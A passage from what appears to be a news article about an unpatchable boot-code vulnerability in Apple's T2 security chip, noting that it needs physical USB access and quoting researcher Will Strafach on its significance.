ROM, low-level code that is fixed in hardware at manufacture and cannot be updated afterwards; a software update can only raise the cost of exploitation, not remove the bug. The practical caveat is that the attack requires physical access to the Mac over USB, which is why it matters most for machines that leave an owner's control.
"The T2 is meant to be this little secure black box in Macs -- a computer inside your computer, handling things like Lost Mode enforcement, integrity checking, and other privileged duties," says Will Strafach, a longtime iOS researcher and creator of the Guardian Firewall app for iOS. "So the significance is that this chip was supposed to be harder to compromise -- but now it's been done."
